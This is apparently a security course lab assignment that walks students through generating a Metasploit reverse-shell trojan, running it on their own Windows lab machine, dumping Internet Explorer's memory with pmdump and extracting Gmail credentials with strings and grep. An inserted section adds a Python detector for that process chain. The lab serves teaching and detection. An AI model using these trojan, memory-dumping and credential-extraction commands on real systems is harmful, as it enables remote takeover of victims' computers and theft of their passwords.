Project 15: Stealing Passwords from RAM with Metasploit (10 pts.)

What You Need

Purpose

Using meterpreter commands, we'll dump the memory of Internet Explorer to a file, download it, and steal passwords from it.

Various Metasploit scripts have been written to automate this process, but changes to Metasploit soon break them, so I recommend using this manual process instead.

Starting Apache on your Kali Machine

In your Kali 2 machine, in a Terminal window, execute these commands:

ifconfig

service apache2 restart

Testing Networking

On your Windows machine, open a Web browser and enter the IP address of your Kali machine.

You should see the Apache2 default page, as shown below. If you can't connect, you need to debug your networking before proceeding.

I recommend placing both machines into NAT networking mode for this project.

Logging in to Gmail

On your Windows machine, in Internet Explorer, open gmail.com and attempt to log in with these credentials, replacing "YOURNAME" with your own name:

Click the "Sign in" button. Gmail won't let you in, but that doesn't matter for our purposes. The important thing for this project is that Internet Explorer placed your credentials into RAM.

Creating a Trojan

In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe

cp fun.exe /var/www/html

Downloading pmdump

We'll use a really old tool--pmdump, from 2002. It still works!

In your Kali 2 machine, in a Terminal window, execute these commands:

curl https://samsclass.info/124/proj14/pmdump.exe > pmdump.exe

file pmdump.exe

cp pmdump.exe /tmp

Starting a Meterpreter Handler

In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.

msfconsole

use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.119.130

exploit

The payload handler waits, listening, as shown below.

Downloading and Executing the Malicious Executable

On your Windows target machine, in a Web browser, enter this URL, replacing the IP address with the IP address of your Kali machine.

http://192.168.119.130/fun.exe

Run the file, as shown below.

Uploading pmdump to the Target

On your Kali machine, a Meterpreter session should be open, as shown below.

At the meterpreter prompt, execute these commands:

cd %TEMP%

pwd

upload /tmp/pmdump.exe %TEMP%

At the meterpreter prompt, execute these commands:

shell

dir

You should see the pmdump.exe file, as shown below.

Execute these commands to see pmdump's usage message, and then to list the processes running on the target system.

pmdump.exe

pmdump.exe -list

Find "iexplore.exe" in the list, and notice its Process ID number, as shown below.

Execute these commands, replacing "1728" with the correct process ID of "iexplore.exe":

pmdump.exe 1728 ie.mem

dir

As shown below, the RAM used by Internet Explorer is now in a file named ie.mem. This file is approximately 95 MB in size.

Execute these commands to leave the Windows shell, return to the Meterpreter prompt, and start downloading the "ie.mem" file:

exit

download ie.mem /tmp

The download starts, but doesn't finish right away, as shown below.

To see the progress of the download, open a new Terminal window and execute these commands:

cd /tmp

watch "ls -l ie.mem"

You can see the file increasing in size, as shown below.

When it's done, you'll see a "download" message and a new "meterpreter" prompt in the window showing the Meterpreter session, as shown below.

In the Terminal window showing the "watch" results, press Ctrl+C to stop "watch".

Execute this command to search for login credentials in the RAM file:

strings ie.mem | grep "@gmail.com"

Your username and password should be easy to find. Highlight them, as shown below:
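The steps above, from running fun.exe out of a browser download to dumping the memory of iexplore.exe with pmdump.exe, leave a recognizable trail in Windows process-creation telemetry: an executable launched from %TEMP%, a command shell whose parent lives in %TEMP%, and a command line of the form "pmdump.exe <pid> <file>". Here, as an added example that is not part of the original project and not Metasploit or pmdump code, is a small Python detector run over constructed sample events; the event shape, the file paths, the "student" user name and the parent/child relationships are assumptions (the PID 1728 is the page's own example value).

```python
"""Flag the process-memory-dump pattern from the lab in process-creation events.

Added defensive example, not part of the original project. The event format is
an assumed, simplified version of Windows process-creation telemetry (image
path, command line, parent image); the sample events below are constructed.
"""
import re

# Constructed sample events in the order the lab's steps would produce them.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\student\AppData\Local\Temp\fun.exe",          # downloaded payload
     "cmdline": "fun.exe",
     "parent": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",                            # meterpreter "shell"
     "cmdline": "cmd.exe",
     "parent": r"C:\Users\student\AppData\Local\Temp\fun.exe"},
    {"image": r"C:\Users\student\AppData\Local\Temp\pmdump.exe",        # pmdump.exe -list
     "cmdline": "pmdump.exe -list",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Users\student\AppData\Local\Temp\pmdump.exe",        # dump of PID 1728
     "cmdline": "pmdump.exe 1728 ie.mem",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",                        # benign noise
     "cmdline": "notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
]

# Per-user and system temp directories; %TEMP% resolves to the first on Windows.
TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# "pmdump.exe <pid> <outfile>": the dump-one-process-to-a-file form used in the lab.
# "pmdump.exe -list" deliberately does not match, since it only enumerates processes.
MEMDUMP_RE = re.compile(r"(?:^|\\)pmdump(?:\.exe)?\s+\d+\s+\S+", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names that match one process-creation event."""
    rules = []
    if TEMP_DIR_RE.search(event["image"]):
        rules.append("exec_from_temp")
    if MEMDUMP_RE.search(event["cmdline"]):
        rules.append("process_memory_dump")
    if basename(event["image"]) in SHELLS and TEMP_DIR_RE.search(event["parent"]):
        rules.append("shell_spawned_by_temp_binary")
    return rules


def detect(events):
    """(index, matched rules) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


def attack_chain_present(events):
    """True when the events show the lab's sequence in order: a binary run from
    %TEMP%, then a shell whose parent is in %TEMP%, then a memory dump of a PID.
    Single hits are noisy on their own; the ordered chain is the stronger signal."""
    wanted = ["exec_from_temp", "shell_spawned_by_temp_binary", "process_memory_dump"]
    idx = 0
    for event in events:
        if wanted[idx] in classify(event):
            idx += 1
            if idx == len(wanted):
                return True
    return False


if __name__ == "__main__":
    for i, rules in detect(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline']!r} -> {', '.join(rules)}")
    print("full chain present:", attack_chain_present(SAMPLE_EVENTS))
```

The individual rules are intentionally broad (installers and updaters also run from %TEMP%), which is why attack_chain_present() correlates them in order: it only fires on the sample set once the dump command itself appears, and not on a prefix that stops at "pmdump.exe -list".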

Saving the Screen Image

Make sure your username and password are visible and highlighted, as shown above.

Save a whole-desktop screen capture with a filename of "Proj 15 from YOUR NAME".

Turning In Your Project

Email the image to cnit.124@gmail.com with a subject of "Project 15 from YOUR NAME".


Posted 11-4-15 by Sam Bowne
Updated 11-16-17